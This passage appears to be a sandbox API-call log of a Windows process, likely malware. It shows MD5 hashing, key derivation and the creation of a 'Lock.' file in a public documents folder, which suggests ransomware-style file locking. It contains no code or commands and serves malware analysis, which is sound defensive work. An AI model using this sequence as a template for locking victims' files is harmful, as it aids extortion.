WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.903] CryptCreateHash (in: hProv=0xa7c880, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.903] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.904] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabcc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.904] CryptHashData (hHash=0x9e2078, pbData=0x2a71cc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.904] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabaa0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.905] CryptDeriveKey (in: hProv=0xa7c880, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.905] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.905] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.905] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.905] CryptDestroyHash (hHash=0x9e2078) returned 1 [0223.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.907] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Videos" (normalized: "c:\\users\\public\\documents\\my videos"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0223.907] GetLastError () returned 0x5 [0223.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.908] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0223.908] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Videos" (normalized: "c:\\users\\public\\documents\\lock.my videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0223.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0223.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0223.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.909] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0223.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0223.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.910] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0223.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.911] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.911] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.911] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.911] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.911] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.911] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.911] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.912] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.912] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.912] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.912] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.912] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.912] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.912] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.912] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0223.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0223.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 